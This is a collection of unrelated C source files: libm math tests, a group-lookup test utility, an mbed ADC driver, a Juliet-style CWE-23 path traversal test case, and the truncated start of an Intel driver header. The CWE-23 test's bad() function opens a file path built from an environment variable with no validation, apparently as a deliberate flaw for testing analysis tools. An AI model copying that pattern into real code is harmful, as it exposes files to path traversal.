GEN_DBL_TEST (fabs (-7.37e+19)); /* finite tests */ /* SKIPPED: not publicly declared in jerry-libm GEN_INT_TEST (finite (0.0)); GEN_INT_TEST (finite (-0.0)); GEN_INT_TEST (finite (1.0)); GEN_INT_TEST (finite (-1.0)); GEN_INT_TEST (finite (INFINITY)); GEN_INT_TEST (finite (-INFINITY)); GEN_INT_TEST (finite (NAN)); GEN_INT_TEST (finite (3.14)); GEN_INT_TEST (finite (-3.14)); GEN_INT_TEST (finite (0.7)); GEN_INT_TEST (finite (-0.7)); GEN_INT_TEST (finite (3.72e-09)); GEN_INT_TEST (finite (-3.72e-09)); GEN_INT_TEST (finite (7.37e+19)); GEN_INT_TEST (finite (-7.37e+19)); */ /* floor tests */ GEN_DBL_TEST (floor (0.0)); GEN_DBL_TEST (floor (-0.0)); GEN_DBL_TEST (floor (INFINITY)); GEN_DBL_TEST (floor (-INFINITY)); GEN_DBL_TEST (floor (NAN)); GEN_DBL_TEST (floor (3.14)); GEN_DBL_TEST (floor (-3.14)); GEN_DBL_TEST (floor (3.72e-09)); GEN_DBL_TEST (floor (-3.72e-09)); GEN_DBL_TEST (floor (7.37e+19)); GEN_DBL_TEST (floor (-7.37e+19)); /* fmod tests */ GEN_DBL_TEST (fmod (0.0, 0.0)); GEN_DBL_TEST (fmod (0.0, -0.0)); GEN_DBL_TEST (fmod (-0.0, 0.0)); GEN_DBL_TEST (fmod (-0.0, -0.0)); GEN_DBL_TEST (fmod (0.0, 3.0)); GEN_DBL_TEST (fmod (0.0, -3.0)); GEN_DBL_TEST (fmod (-0.0, 3.0)); GEN_DBL_TEST (fmod (-0.0, -3.0)); GEN_DBL_TEST (fmod (0.0, INFINITY)); GEN_DBL_TEST (fmod (0.0, -INFINITY)); GEN_DBL_TEST (fmod (-0.0, INFINITY)); GEN_DBL_TEST (fmod (-0.0, -INFINITY)); GEN_DBL_TEST (fmod (0.0, NAN)); GEN_DBL_TEST (fmod (-0.0, NAN)); GEN_DBL_TEST (fmod (3.0, 0.0)); GEN_DBL_TEST (fmod (3.0, -0.0)); GEN_DBL_TEST (fmod (-3.0, 0.0)); GEN_DBL_TEST (fmod (-3.0, -0.0)); GEN_DBL_TEST (fmod (3.0, 3.0)); GEN_DBL_TEST (fmod (3.0, -3.0)); GEN_DBL_TEST (fmod (-3.0, 3.0)); GEN_DBL_TEST (fmod (-3.0, -3.0)); GEN_DBL_TEST (fmod (3.0, INFINITY)); GEN_DBL_TEST (fmod (3.0, -INFINITY)); GEN_DBL_TEST (fmod (-3.0, INFINITY)); GEN_DBL_TEST (fmod (-3.0, -INFINITY)); GEN_DBL_TEST (fmod (3.0, NAN)); GEN_DBL_TEST (fmod (-3.0, NAN)); GEN_DBL_TEST (fmod (INFINITY, 0.0)); GEN_DBL_TEST (fmod (INFINITY, -0.0)); GEN_DBL_TEST (fmod (-INFINITY, 0.0)); GEN_DBL_TEST (fmod (-INFINITY, -0.0)); GEN_DBL_TEST (fmod (INFINITY, 3.0)); GEN_DBL_TEST (fmod (INFINITY, -3.0)); GEN_DBL_TEST (fmod (-INFINITY, 3.0)); GEN_DBL_TEST (fmod (-INFINITY, -3.0)); GEN_DBL_TEST (fmod (INFINITY, INFINITY)); GEN_DBL_TEST (fmod (INFINITY, -INFINITY)); GEN_DBL_TEST (fmod (-INFINITY, INFINITY)); GEN_DBL_TEST (fmod (-INFINITY, -INFINITY)); GEN_DBL_TEST (fmod (INFINITY, NAN)); GEN_DBL_TEST (fmod (-INFINITY, NAN)); GEN_DBL_TEST (fmod (NAN, 0.0)); GEN_DBL_TEST (fmod (NAN, -0.0)); GEN_DBL_TEST (fmod (NAN, 3.0)); GEN_DBL_TEST (fmod (NAN, -3.0)); GEN_DBL_TEST (fmod (NAN, INFINITY)); GEN_DBL_TEST (fmod (NAN, -INFINITY)); GEN_DBL_TEST (fmod (NAN, NAN)); GEN_DBL_TEST (fmod (3.0, 1.0)); GEN_DBL_TEST (fmod (3.0, -1.0)); GEN_DBL_TEST (fmod (-3.0, 1.0)); GEN_DBL_TEST (fmod (-3.0, -1.0)); GEN_DBL_TEST (fmod (6.5, 2.3)); GEN_DBL_TEST (fmod (6.5, -2.3)); GEN_DBL_TEST (fmod (-6.5, 2.3)); GEN_DBL_TEST (fmod (-6.5, -2.3)); /* isnan tests */ GEN_INT_TEST (isnan (0.0)); GEN_INT_TEST (isnan (-0.0)); GEN_INT_TEST (isnan (1.0)); GEN_INT_TEST (isnan (-1.0)); GEN_INT_TEST (isnan (INFINITY)); GEN_INT_TEST (isnan (-INFINITY)); GEN_INT_TEST (isnan (NAN)); GEN_INT_TEST (isnan (3.14)); GEN_INT_TEST (isnan (-3.14)); GEN_INT_TEST (isnan (0.7)); GEN_INT_TEST (isnan (-0.7)); GEN_INT_TEST (isnan (3.72e-09)); GEN_INT_TEST (isnan (-3.72e-09)); GEN_INT_TEST (isnan (7.37e+19)); GEN_INT_TEST (isnan (-7.37e+19)); /* log tests */ GEN_DBL_TEST (log (0.0)); GEN_DBL_TEST (log (-0.0)); GEN_DBL_TEST (log (1.0)); GEN_DBL_TEST (log (-1.0)); GEN_DBL_TEST (log (INFINITY)); GEN_DBL_TEST (log (-INFINITY)); GEN_DBL_TEST (log (NAN)); GEN_DBL_TEST (log (M_E)); GEN_DBL_TEST (log (1.0 / M_E)); GEN_DBL_TEST (log (2)); GEN_DBL_TEST (log (10)); GEN_DBL_TEST (log (0.7)); GEN_DBL_TEST (log (2.22e-308)); GEN_DBL_TEST (log (2.23e-308)); GEN_DBL_TEST (log (0.17)); GEN_DBL_TEST (log (0.18)); GEN_DBL_TEST (log (1999.0)); GEN_DBL_TEST (log (2000.0)); GEN_DBL_TEST (log (2001.0)); /* pow tests */ GEN_DBL_TEST (pow (0.0, 0.0)); GEN_DBL_TEST (pow (0.0, -0.0)); GEN_DBL_TEST (pow (-0.0, 0.0)); GEN_DBL_TEST (pow (-0.0, -0.0)); GEN_DBL_TEST (pow (0.0, 1.0)); GEN_DBL_TEST (pow (0.0, -1.0)); GEN_DBL_TEST (pow (-0.0, 1.0)); GEN_DBL_TEST (pow (-0.0, -1.0)); GEN_DBL_TEST (pow (0.0, INFINITY)); GEN_DBL_TEST (pow (0.0, -INFINITY)); GEN_DBL_TEST (pow (-0.0, INFINITY)); GEN_DBL_TEST (pow (-0.0, -INFINITY)); GEN_DBL_TEST (pow (0.0, NAN)); GEN_DBL_TEST (pow (-0.0, NAN)); GEN_DBL_TEST (pow (1.0, 0.0)); GEN_DBL_TEST (pow (1.0, -0.0)); GEN_DBL_TEST (pow (-1.0, 0.0)); GEN_DBL_TEST (pow (-1.0, -0.0)); GEN_DBL_TEST (pow (1.0, 1.0)); GEN_DBL_TEST (pow (1.0, -1.0)); GEN_DBL_TEST (pow (-1.0, 1.0)); GEN_DBL_TEST (pow (-1.0, -1.0)); GEN_DBL_TEST (pow (1.0, INFINITY)); GEN_DBL_TEST (pow (1.0, -INFINITY)); GEN_DBL_TEST (pow (-1.0, INFINITY)); GEN_DBL_TEST (pow (-1.0, -INFINITY)); GEN_DBL_TEST (pow (1.0, NAN)); GEN_DBL_TEST (pow (-1.0, NAN)); GEN_DBL_TEST (pow (INFINITY, 0.0)); GEN_DBL_TEST (pow (INFINITY, -0.0)); GEN_DBL_TEST (pow (-INFINITY, 0.0)); GEN_DBL_TEST (pow (-INFINITY, -0.0)); GEN_DBL_TEST (pow (INFINITY, 1.0)); GEN_DBL_TEST (pow (INFINITY, -1.0)); GEN_DBL_TEST (pow (-INFINITY, 1.0)); GEN_DBL_TEST (pow (-INFINITY, -1.0)); GEN_DBL_TEST (pow (INFINITY, INFINITY)); GEN_DBL_TEST (pow (INFINITY, -INFINITY)); GEN_DBL_TEST (pow (-INFINITY, INFINITY)); GEN_DBL_TEST (pow (-INFINITY, -INFINITY)); GEN_DBL_TEST (pow (INFINITY, NAN)); GEN_DBL_TEST (pow (-INFINITY, NAN)); GEN_DBL_TEST (pow (NAN, 0.0)); GEN_DBL_TEST (pow (NAN, -0.0)); GEN_DBL_TEST (pow (NAN, 1.0)); GEN_DBL_TEST (pow (NAN, -1.0)); GEN_DBL_TEST (pow (NAN, INFINITY)); GEN_DBL_TEST (pow (NAN, -INFINITY)); GEN_DBL_TEST (pow (NAN, NAN)); GEN_DBL_TEST (pow (0.9, INFINITY)); GEN_DBL_TEST (pow (0.9, -INFINITY)); GEN_DBL_TEST (pow (-0.9, INFINITY)); GEN_DBL_TEST (pow (-0.9, -INFINITY)); GEN_DBL_TEST (pow (1.1, INFINITY)); GEN_DBL_TEST (pow (1.1, -INFINITY)); GEN_DBL_TEST (pow (-1.1, INFINITY)); GEN_DBL_TEST (pow (-1.1, -INFINITY)); GEN_DBL_TEST (pow (0.0, 2.0)); GEN_DBL_TEST (pow (0.0, -2.0)); GEN_DBL_TEST (pow (-0.0, 2.0)); GEN_DBL_TEST (pow (-0.0, -2.0)); GEN_DBL_TEST (pow (0.0, 3.0)); GEN_DBL_TEST (pow (0.0, -3.0)); GEN_DBL_TEST (pow (-0.0, 3.0)); GEN_DBL_TEST (pow (-0.0, -3.0)); GEN_DBL_TEST (pow (0.0, 3.14)); GEN_DBL_TEST (pow (0.0, -3.14)); GEN_DBL_TEST (pow (-0.0, 3.14)); GEN_DBL_TEST (pow (-0.0, -3.14)); GEN_DBL_TEST (pow (1.0, 3.14)); GEN_DBL_TEST (pow (1.0, -3.14)); GEN_DBL_TEST (pow (-1.0, 3.14)); GEN_DBL_TEST (pow (-1.0, -3.14)); GEN_DBL_TEST (pow (3.14, 0.0)); GEN_DBL_TEST (pow (3.14, -0.0)); GEN_DBL_TEST (pow (-3.14, 0.0)); GEN_DBL_TEST (pow (-3.14, -0.0)); GEN_DBL_TEST (pow (3.14, 1.0)); GEN_DBL_TEST (pow (3.14, -1.0)); GEN_DBL_TEST (pow (-3.14, 1.0)); GEN_DBL_TEST (pow (-3.14, -1.0)); GEN_DBL_TEST (pow (3.14, 2.0)); GEN_DBL_TEST (pow (3.14, -2.0)); GEN_DBL_TEST (pow (-3.14, 2.0)); GEN_DBL_TEST (pow (-3.14, -2.0)); GEN_DBL_TEST (pow (3.14, 3.0)); GEN_DBL_TEST (pow (3.14, -3.0)); GEN_DBL_TEST (pow (-3.14, 3.0)); GEN_DBL_TEST (pow (-3.14, -3.0)); GEN_DBL_TEST (pow (3.14, 3.14)); GEN_DBL_TEST (pow (3.14, -3.14)); GEN_DBL_TEST (pow (-3.14, 3.14)); GEN_DBL_TEST (pow (-3.14, -3.14)); GEN_DBL_TEST (pow (INFINITY, 2.0)); GEN_DBL_TEST (pow (INFINITY, -2.0)); GEN_DBL_TEST (pow (-INFINITY, 2.0)); GEN_DBL_TEST (pow (-INFINITY, -2.0)); GEN_DBL_TEST (pow (INFINITY, 3.0)); GEN_DBL_TEST (pow (INFINITY, -3.0)); GEN_DBL_TEST (pow (-INFINITY, 3.0)); GEN_DBL_TEST (pow (-INFINITY, -3.0)); GEN_DBL_TEST (pow (INFINITY, 3.14)); GEN_DBL_TEST (pow (INFINITY, -3.14)); GEN_DBL_TEST (pow (-INFINITY, 3.14)); GEN_DBL_TEST (pow (-INFINITY, -3.14)); GEN_DBL_TEST (pow (0.7, 1.2)); /* scalbn tests */ /* SKIPPED: not publicly declared in jerry-libm GEN_DBL_TEST (scalbn (0.0, 0)); GEN_DBL_TEST (scalbn (-0.0, 0)); GEN_DBL_TEST (scalbn (0.0, 1)); GEN_DBL_TEST (scalbn (0.0, -1)); GEN_DBL_TEST (scalbn (-0.0, 1)); GEN_DBL_TEST (scalbn (-0.0, -1)); GEN_DBL_TEST (scalbn (1.0, 0)); GEN_DBL_TEST (scalbn (-1.0, 0)); GEN_DBL_TEST (scalbn (1.0, 1)); GEN_DBL_TEST (scalbn (1.0, -1)); GEN_DBL_TEST (scalbn (-1.0, 1)); GEN_DBL_TEST (scalbn (-1.0, -1)); GEN_DBL_TEST (scalbn (INFINITY, 0)); GEN_DBL_TEST (scalbn (-INFINITY, 0)); GEN_DBL_TEST (scalbn (INFINITY, 1)); GEN_DBL_TEST (scalbn (INFINITY, -1)); GEN_DBL_TEST (scalbn (-INFINITY, 1)); GEN_DBL_TEST (scalbn (-INFINITY, -1)); GEN_DBL_TEST (scalbn (NAN, 0)); GEN_DBL_TEST (scalbn (NAN, 1)); GEN_DBL_TEST (scalbn (NAN, -1)); GEN_DBL_TEST (scalbn (3.14, -1)); GEN_DBL_TEST (scalbn (-3.14, 1)); GEN_DBL_TEST (scalbn (0.7, 4)); GEN_DBL_TEST (scalbn (0.7, -4)); GEN_DBL_TEST (scalbn (-0.7, 4)); GEN_DBL_TEST (scalbn (-0.7, -4)); GEN_DBL_TEST (scalbn (0.8, 5)); GEN_DBL_TEST (scalbn (0.8, -5)); GEN_DBL_TEST (scalbn (-0.8, 5)); GEN_DBL_TEST (scalbn (-0.8, -5)); GEN_DBL_TEST (scalbn (5.55e-18, 49999)); GEN_DBL_TEST (scalbn (5.55e-18, 50000)); GEN_DBL_TEST (scalbn (5.55e-18, 50001)); GEN_DBL_TEST (scalbn (1.0, -49999)); GEN_DBL_TEST (scalbn (1.0, -50000)); GEN_DBL_TEST (scalbn (1.0, -50001)); */ /* sqrt tests */ GEN_DBL_TEST (sqrt (0.0)); GEN_DBL_TEST (sqrt (-0.0)); GEN_DBL_TEST (sqrt (1.0)); GEN_DBL_TEST (sqrt (-1.0)); GEN_DBL_TEST (sqrt (INFINITY)); GEN_DBL_TEST (sqrt (-INFINITY)); GEN_DBL_TEST (sqrt (NAN)); GEN_DBL_TEST (sqrt (0.7)); GEN_DBL_TEST (sqrt (2)); GEN_DBL_TEST (sqrt (10)); GEN_DBL_TEST (sqrt (2.22e-308)); GEN_DBL_TEST (sqrt (2.23e-308)); GEN_DBL_TEST (sqrt (3.72e-09)); GEN_DBL_TEST (sqrt (7.37e+19)); GEN_DBL_TEST (sqrt (2209)); GEN_DBL_TEST (sqrt (4)); GEN_DBL_TEST (sqrt (0.25)); GEN_DBL_TEST (sqrt (6642.25)); GEN_DBL_TEST (sqrt (15239.9025)); /* sin tests */ GEN_DBL_TEST (sin (0.0)); GEN_DBL_TEST (sin (-0.0)); GEN_DBL_TEST (sin (1.0)); GEN_DBL_TEST (sin (-1.0)); GEN_DBL_TEST (sin (INFINITY)); GEN_DBL_TEST (sin (-INFINITY)); GEN_DBL_TEST (sin (NAN)); GEN_DBL_TEST (sin (M_PI)); GEN_DBL_TEST (sin (-M_PI)); GEN_DBL_TEST (sin (2.0 * M_PI)); GEN_DBL_TEST (sin (-2.0 * M_PI)); GEN_DBL_TEST (sin (M_PI / 2.0)); GEN_DBL_TEST (sin (-M_PI / 2.0)); GEN_DBL_TEST (sin (M_PI / 3.0)); GEN_DBL_TEST (sin (-M_PI / 3.0)); GEN_DBL_TEST (sin (M_PI / 4.0)); GEN_DBL_TEST (sin (-M_PI / 4.0)); GEN_DBL_TEST (sin (M_PI / 6.0)); GEN_DBL_TEST (sin (-M_PI / 6.0)); GEN_DBL_TEST (sin (M_PI * 2.0 / 3.0)); GEN_DBL_TEST (sin (-M_PI * 2.0 / 3.0)); GEN_DBL_TEST (sin (M_PI * 5.0 / 6.0)); GEN_DBL_TEST (sin (-M_PI * 5.0 / 6.0)); GEN_DBL_TEST (sin (6.9e-18)); GEN_DBL_TEST (sin (-6.9e-18)); GEN_DBL_TEST (sin (7.0e-18)); GEN_DBL_TEST (sin (-7.0e-18)); GEN_DBL_TEST (sin (7.4e-9)); GEN_DBL_TEST (sin (-7.4e-9)); GEN_DBL_TEST (sin (7.5e-9)); GEN_DBL_TEST (sin (-7.5e-9)); GEN_DBL_TEST (sin (0.2)); GEN_DBL_TEST (sin (-0.2)); GEN_DBL_TEST (sin (0.4)); GEN_DBL_TEST (sin (-0.4)); GEN_DBL_TEST (sin (0.7)); GEN_DBL_TEST (sin (-0.7)); GEN_DBL_TEST (sin (0.8)); GEN_DBL_TEST (sin (-0.8)); GEN_DBL_TEST (sin (3.0)); GEN_DBL_TEST (sin (-3.0)); GEN_DBL_TEST (sin (4.0)); GEN_DBL_TEST (sin (-4.0)); GEN_DBL_TEST (sin (6.0)); GEN_DBL_TEST (sin (-6.0)); GEN_DBL_TEST (sin (7.0)); GEN_DBL_TEST (sin (-7.0)); /* cos tests */ GEN_DBL_TEST (cos (0.0)); GEN_DBL_TEST (cos (-0.0)); GEN_DBL_TEST (cos (1.0)); GEN_DBL_TEST (cos (-1.0)); GEN_DBL_TEST (cos (INFINITY)); GEN_DBL_TEST (cos (-INFINITY)); GEN_DBL_TEST (cos (NAN)); GEN_DBL_TEST (cos (M_PI)); GEN_DBL_TEST (cos (-M_PI)); GEN_DBL_TEST (cos (2.0 * M_PI)); GEN_DBL_TEST (cos (-2.0 * M_PI)); GEN_DBL_TEST (cos (M_PI / 2.0)); GEN_DBL_TEST (cos (-M_PI / 2.0)); GEN_DBL_TEST (cos (M_PI / 3.0)); GEN_DBL_TEST (cos (-M_PI / 3.0)); GEN_DBL_TEST (cos (M_PI / 4.0)); GEN_DBL_TEST (cos (-M_PI / 4.0)); GEN_DBL_TEST (cos (M_PI / 6.0)); GEN_DBL_TEST (cos (-M_PI / 6.0)); GEN_DBL_TEST (cos (M_PI * 2.0 / 3.0)); GEN_DBL_TEST (cos (-M_PI * 2.0 / 3.0)); GEN_DBL_TEST (cos (M_PI * 5.0 / 6.0)); GEN_DBL_TEST (cos (-M_PI * 5.0 / 6.0)); GEN_DBL_TEST (cos (6.9e-18)); GEN_DBL_TEST (cos (-6.9e-18)); GEN_DBL_TEST (cos (7.0e-18)); GEN_DBL_TEST (cos (-7.0e-18)); GEN_DBL_TEST (cos (7.4e-9)); GEN_DBL_TEST (cos (-7.4e-9)); GEN_DBL_TEST (cos (7.5e-9)); GEN_DBL_TEST (cos (-7.5e-9)); GEN_DBL_TEST (cos (0.2)); GEN_DBL_TEST (cos (-0.2)); GEN_DBL_TEST (cos (0.4)); GEN_DBL_TEST (cos (-0.4)); GEN_DBL_TEST (cos (0.7)); GEN_DBL_TEST (cos (-0.7)); GEN_DBL_TEST (cos (0.8)); GEN_DBL_TEST (cos (-0.8)); GEN_DBL_TEST (cos (3.0)); GEN_DBL_TEST (cos (-3.0)); GEN_DBL_TEST (cos (4.0)); GEN_DBL_TEST (cos (-4.0)); GEN_DBL_TEST (cos (6.0)); GEN_DBL_TEST (cos (-6.0)); GEN_DBL_TEST (cos (7.0)); GEN_DBL_TEST (cos (-7.0)); /* tan tests */ GEN_DBL_TEST (tan (0.0)); GEN_DBL_TEST (tan (-0.0)); GEN_DBL_TEST (tan (1.0)); GEN_DBL_TEST (tan (-1.0)); GEN_DBL_TEST (tan (INFINITY)); GEN_DBL_TEST (tan (-INFINITY)); GEN_DBL_TEST (tan (NAN)); GEN_DBL_TEST (tan (M_PI)); GEN_DBL_TEST (tan (-M_PI)); GEN_DBL_TEST (tan (2.0 * M_PI)); GEN_DBL_TEST (tan (-2.0 * M_PI)); GEN_DBL_TEST (tan (M_PI / 2.0)); GEN_DBL_TEST (tan (-M_PI / 2.0)); GEN_DBL_TEST (tan (M_PI / 3.0)); GEN_DBL_TEST (tan (-M_PI / 3.0)); GEN_DBL_TEST (tan (M_PI / 4.0)); GEN_DBL_TEST (tan (-M_PI / 4.0)); GEN_DBL_TEST (tan (M_PI / 6.0)); GEN_DBL_TEST (tan (-M_PI / 6.0)); GEN_DBL_TEST (tan (M_PI * 2.0 / 3.0)); GEN_DBL_TEST (tan (-M_PI * 2.0 / 3.0)); GEN_DBL_TEST (tan (M_PI * 5.0 / 6.0)); GEN_DBL_TEST (tan (-M_PI * 5.0 / 6.0)); GEN_DBL_TEST (tan (3.7e-9)); GEN_DBL_TEST (tan (-3.7e-9)); GEN_DBL_TEST (tan (3.8e-9)); GEN_DBL_TEST (tan (-3.8e-9)); GEN_DBL_TEST (tan (0.6)); GEN_DBL_TEST (tan (-0.6)); GEN_DBL_TEST (tan (0.7)); GEN_DBL_TEST (tan (-0.7)); GEN_DBL_TEST (tan (3.0)); GEN_DBL_TEST (tan (-3.0)); GEN_DBL_TEST (tan (4.0)); GEN_DBL_TEST (tan (-4.0)); GEN_DBL_TEST (tan (6.0)); GEN_DBL_TEST (tan (-6.0)); GEN_DBL_TEST (tan (7.0)); GEN_DBL_TEST (tan (-7.0)); } /* main */
274465.c
/* Editor Settings: expandtabs and use 4 spaces for indentation * ex: set softtabstop=4 tabstop=8 expandtab shiftwidth=4: * * -*- mode: c, c-basic-offset: 4 -*- */ /* * Copyright © BeyondTrust Software 2004 - 2019 * All rights reserved. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * * BEYONDTRUST MAKES THIS SOFTWARE AVAILABLE UNDER OTHER LICENSING TERMS AS * WELL. IF YOU HAVE ENTERED INTO A SEPARATE LICENSE AGREEMENT WITH * BEYONDTRUST, THEN YOU MAY ELECT TO USE THE SOFTWARE UNDER THE TERMS OF THAT * SOFTWARE LICENSE AGREEMENT INSTEAD OF THE TERMS OF THE APACHE LICENSE, * NOTWITHSTANDING THE ABOVE NOTICE. IF YOU HAVE QUESTIONS, OR WISH TO REQUEST * A COPY OF THE ALTERNATE LICENSING TERMS OFFERED BY BEYONDTRUST, PLEASE CONTACT * BEYONDTRUST AT beyondtrust.com/contact */ #define _POSIX_PTHREAD_SEMANTICS 1 #include "config.h" #include "lsasystem.h" #include "lsadef.h" #include "lsa/lsa.h" #include "lwmem.h" #include "lwstr.h" #include "lwsecurityidentifier.h" #include "lsautils.h" static void ShowUsage() { printf("Usage: test-getgracct idtogroup <gid>\n"); } static int ParseArgs( int argc, char* argv[], gid_t* gid ) { PSTR pszCommand = NULL; PSTR pszGid = NULL; DWORD ret = 0; PSTR pszArg = NULL; if( argc != 3 ) { ShowUsage(); exit(0); } pszCommand = argv[1]; if( strcmp(pszCommand, "idtogroup")!=0 ) { ShowUsage(); exit(0); } pszGid = argv[2]; *gid = (gid_t) atoi(pszGid); cleanup: return ret; error: ret = 1; goto cleanup; } int main( int argc, char* argv[] ) { gid_t gid; DWORD dwError; int ret = 0; PSTR pszId = NULL; PSTR pszGroupName = NULL; dwError = ParseArgs(argc, argv, &gid); pszGroupName = IDtogroup ( gid ); printf("IDtoGroup:\n"); printf("==========\n"); printf("Gid: %u\n", (unsigned int)gid); printf("Group Name: %s\n" , LW_IS_NULL_OR_EMPTY_STR(pszGroupName) ? "<null>" : pszGroupName); cleanup: LW_SAFE_FREE_STRING(pszGroupName); return ret; error: ret = 1; goto cleanup; }
1001097.c
/* mbed Microcontroller Library * Copyright (c) 2006-2013 ARM Limited * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include "mbed_assert.h" #include "analogin_api.h" #if DEVICE_ANALOGIN #include "cmsis.h" #include "pinmap.h" #include "PeripheralNames.h" #include "fsl_adc16.h" #include "PeripheralPins.h" /* Array of ADC peripheral base address. */ static ADC_Type *const adc_addrs[] = ADC_BASE_PTRS; #define MAX_FADC 6000000 void analogin_init(analogin_t *obj, PinName pin) { obj->adc = (ADCName)pinmap_peripheral(pin, PinMap_ADC); MBED_ASSERT(obj->adc != (ADCName)NC); uint32_t instance = obj->adc >> ADC_INSTANCE_SHIFT; uint32_t bus_clock; adc16_config_t adc16_config; bus_clock = CLOCK_GetFreq(kCLOCK_BusClk); uint32_t clkdiv; for (clkdiv = 0; clkdiv < 4; clkdiv++) { if ((bus_clock >> clkdiv) <= MAX_FADC) break; } if (clkdiv == 4) { clkdiv = 0x3; //Set max div } ADC16_GetDefaultConfig(&adc16_config); adc16_config.clockSource = kADC16_ClockSourceAlt0; adc16_config.clockDivider = (adc16_clock_divider_t)clkdiv; adc16_config.resolution = kADC16_ResolutionSE16Bit; ADC16_Init(adc_addrs[instance], &adc16_config); ADC16_EnableHardwareTrigger(adc_addrs[instance], false); ADC16_SetHardwareAverage(adc_addrs[instance], kADC16_HardwareAverageCount4); ADC16_SetChannelMuxMode(adc_addrs[instance], obj->adc & (1 << ADC_B_CHANNEL_SHIFT) ? kADC16_ChannelMuxB : kADC16_ChannelMuxA); pinmap_pinout(pin, PinMap_ADC); } uint16_t analogin_read_u16(analogin_t *obj) { uint32_t instance = obj->adc >> ADC_INSTANCE_SHIFT; adc16_channel_config_t adc16_channel_config; adc16_channel_config.channelNumber = obj->adc & 0xF; adc16_channel_config.enableInterruptOnConversionCompleted = false; /* * When in software trigger mode, each conversion would be launched once calling the "ADC16_ChannelConfigure()" * function, which works like writing a conversion command and executing it. */ ADC16_SetChannelConfig(adc_addrs[instance], 0, &adc16_channel_config); while (0U == (kADC16_ChannelConversionDoneFlag & ADC16_GetChannelStatusFlags(adc_addrs[instance], 0))) { } return ADC16_GetChannelConversionValue(adc_addrs[instance], 0); } float analogin_read(analogin_t *obj) { uint16_t value = analogin_read_u16(obj); return (float)value * (1.0f / (float)0xFFFF); } #endif
405815.c
/* TEMPLATE GENERATED TESTCASE FILE Filename: CWE23_Relative_Path_Traversal__char_Environment_open_03.c Label Definition File: CWE23_Relative_Path_Traversal.label.xml Template File: sources-sink-03.tmpl.c */ /* * @description * CWE: 23 Relative Path Traversal * BadSource: Environment Read input from an environment variable * GoodSource: File name without a period or slash * Sink: open * BadSink : * Flow Variant: 03 Control flow: if(5==5) and if(5!=5) * * */ #include "std_testcase.h" #ifdef _WIN32 #define BASEPATH "c:\\temp\\" #else #define BASEPATH "/tmp/" #endif #define ENV_VARIABLE "ADD" #ifdef _WIN32 # define GETENV getenv #else # define GETENV getenv #endif #ifdef _WIN32 # define OPEN _open # define CLOSE _close #else # define OPEN open # define CLOSE close #endif #ifndef OMITBAD void CWE23_Relative_Path_Traversal__char_Environment_open_03_bad() { char * data; char data_buf[FILENAME_MAX] = BASEPATH; data = data_buf; if(5==5) { { /* Read input from an environment variable */ size_t data_len = strlen(data); char * environment = GETENV(ENV_VARIABLE); /* If there is data in the environment variable */ if (environment != NULL) { strncat(data+data_len, environment, 100-data_len-1); } } } else { /* INCIDENTAL: CWE 561 Dead Code, the code below will never run */ /* FIX: File name does not contain a period or slash */ strcat(data, "file.txt"); } { int fd; /* POTENTIAL FLAW: Possibly opening a file without validating the file name or path */ fd = OPEN(data, O_RDWR|O_CREAT, S_IREAD|S_IWRITE); if (fd != -1) { CLOSE(fd); } } } #endif /* OMITBAD */ #ifndef OMITGOOD /* goodG2B1() - use goodsource and badsink by changing the 5==5 to 5!=5 */ static void goodG2B1() { char * data; char data_buf[FILENAME_MAX] = BASEPATH; data = data_buf; if(5!=5) { /* INCIDENTAL: CWE 561 Dead Code, the code below will never run */ { /* Read input from an environment variable */ size_t data_len = strlen(data); char * environment = GETENV(ENV_VARIABLE); /* If there is data in the environment variable */ if (environment != NULL) { strncat(data+data_len, environment, 100-data_len-1); } } } else { /* FIX: File name does not contain a period or slash */ strcat(data, "file.txt"); } { int fd; /* POTENTIAL FLAW: Possibly opening a file without validating the file name or path */ fd = OPEN(data, O_RDWR|O_CREAT, S_IREAD|S_IWRITE); if (fd != -1) { CLOSE(fd); } } } /* goodG2B2() - use goodsource and badsink by reversing the blocks in the if statement */ static void goodG2B2() { char * data; char data_buf[FILENAME_MAX] = BASEPATH; data = data_buf; if(5==5) { /* FIX: File name does not contain a period or slash */ strcat(data, "file.txt"); } else { /* INCIDENTAL: CWE 561 Dead Code, the code below will never run */ { /* Read input from an environment variable */ size_t data_len = strlen(data); char * environment = GETENV(ENV_VARIABLE); /* If there is data in the environment variable */ if (environment != NULL) { strncat(data+data_len, environment, 100-data_len-1); } } } { int fd; /* POTENTIAL FLAW: Possibly opening a file without validating the file name or path */ fd = OPEN(data, O_RDWR|O_CREAT, S_IREAD|S_IWRITE); if (fd != -1) { CLOSE(fd); } } } void CWE23_Relative_Path_Traversal__char_Environment_open_03_good() { goodG2B1(); goodG2B2(); } #endif /* OMITGOOD */ /* Below is the main(). It is only used when building this testcase on its own for testing or for building a binary to use in testing binary analysis tools. It is not used when compiling all the testcases as one application, which is how source code analysis tools are tested. */ #ifdef INCLUDEMAIN int main(int argc, char * argv[]) { /* seed randomness */ srand( (unsigned)time(NULL) ); #ifndef OMITGOOD printLine("Calling good()..."); CWE23_Relative_Path_Traversal__char_Environment_open_03_good(); printLine("Finished good()"); #endif /* OMITGOOD */ #ifndef OMITBAD printLine("Calling bad()..."); CWE23_Relative_Path_Traversal__char_Environment_open_03_bad(); printLine("Finished bad()"); #endif /* OMITBAD */ return 0; } #endif
123486.c
/******************************************************************************* Intel(R) 82576 Virtual Function Linux driver Copyright(c) 2009 Intel Corporation. Copyright(c) 2010 Eric Keller <ekeller@princeton.edu> Copyright(c) 2010 Red Hat Inc. Alex Williamson <alex.williamson@redhat.com> This program is free software; you can redistribute it and/or modify it under the terms and conditions of the GNU General Public License, version 2, as published by the Free Software Foundation. This program is distributed in the hope it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin St - Fifth Floor, Boston, MA 